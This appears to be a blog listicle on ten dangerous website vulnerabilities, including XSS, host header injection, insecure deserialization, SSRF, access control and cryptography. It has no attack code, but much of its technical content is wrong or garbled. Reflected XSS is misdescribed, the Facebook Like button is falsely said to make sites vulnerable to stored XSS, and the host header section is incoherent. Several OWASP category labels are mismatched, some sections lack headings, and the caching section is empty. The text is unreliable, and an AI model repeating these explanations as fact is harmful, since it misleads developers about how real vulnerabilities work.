When developing a website or web application, developers have to decide what features are the most important to include and, in some cases, when it’s appropriate to leave certain functions out in order to save time and resources. However, every website or web application has vulnerabilities – some are just more dangerous than others. Here are ten of the most dangerous vulnerabilities that have affected popular websites and applications over the past several years and why they’re so serious.
Cross-Site Scripting (XSS)
XSS vulnerabilities allow attackers to inject malicious code into your website. These attacks commonly take two forms: Stored XSS where an attacker places malicious code on a site that is then displayed to visitors through, for example, a comment or like function; and Reflected XSS where an attacker places malicious code in their own browser that is then automatically sent back to your website when they visit. If you use something like Facebook’s Like button on your website, you’re almost certainly vulnerable to stored XSS. When creating user-generated content sites, it’s essential to filter any data input by users so as not to allow them to execute these types of attacks. With many websites using third-party widgets such as Google Maps and Facebook comments, it can be difficult (if not impossible) to completely eliminate XSS risks.
This attack occurs when an application is designed to allow users to enter or upload information which, after being entered or uploaded, is somehow revealed to an unintended recipient. The actual act of leaking data may take place at any point during or after its collection by an application. Email addresses are a common form of data that websites leak in breach-related incidents, but more sensitive information like usernames and passwords have also been breached via data leakage.
Host Header Injection
With just a few keystrokes, hackers can infiltrate a website by injecting code into its host header. Because most browsers, including Chrome and Firefox, allow sites to choose their own host headers, cybercriminals can use one website’s domain name to direct visitors to another site. Once they do that, they are able to access log-in credentials and otherwise secure information through phishing and malware attacks. The Electronic Frontier Foundation released an open source tool that helps webmasters detect instances of host header injection.
Insufficient Transport Layer Protection
If a website doesn’t use HTTPS (Hypertext Transfer Protocol Secure), it can allow hackers to see private information that you enter into your browser. This includes usernames, passwords, credit card numbers and more. If you log in to websites without using HTTPS or don’t pay attention to whether a website uses HTTPS when you enter sensitive information, you’re exposed to cybercriminals who may use man-in-the-middle attacks or phishing schemes.
Lack of Binary Protections (OWASP A9 – Insecure Deserialization)
Web servers accept data in multiple formats such as XML, HTML, etc. Deserialization is a process where low-level objects are transformed into a higher level object or vice versa. However, improperly configured deserialization can allow attackers to execute arbitrary code on application servers. Properly validate and restrict user input. For example, Microsoft has released Security Advisory (959263) to address these deserialization attacks.
By far, security misconfiguration is one of the most dangerous website vulnerabilities. When a site is misconfigured, it can expose sensitive data to anyone who knows where to look. Misconfigurations occur when an organization fails to adjust their configuration settings according to best practices, or simply neglects to make sure their settings are set at all. Some web servers have default configurations that will expose information even if they aren’t intended for public use.
Sensitive Data Exposure Through Caching
Server Side Request Forgery (SSRF)
SSRF is a type of security vulnerability that occurs when an attacker tricks a server into sending malicious requests to other hosts or network services within its reach. This means attackers can use SSRF to launch attacks against services and hosts on other networks. Many protocols and software are vulnerable to SSRF attacks, as they don’t typically verify where incoming requests come from.
Improper Access Control (OWASP A1 – Broken Authentication and Session Management)
Improper access control occurs when data is exposed without proper authorization checks. It can happen when untrusted or unauthenticated users are allowed to interact with sensitive data (for example, a website allowing access to sensitive accounts if an attacker can guess or obtain an ID and password). Improper access control leads to broken authentication and session management. In other words, it makes your system vulnerable because it doesn’t properly check who’s doing what—and thus how they’re accessing that information.
Insufficient Cryptography (OWASP A3 – Insecure Use of Cryptography)
Insufficient cryptography refers to using poor encryption or inappropriate data protection algorithms, leaving your website vulnerable to hacking attacks. To protect sensitive information, use a modern cipher suite like TLS with AES-256 encryption to keep your customers’ data safe and secure. (OWASP A3 – Insecure Use of Cryptography)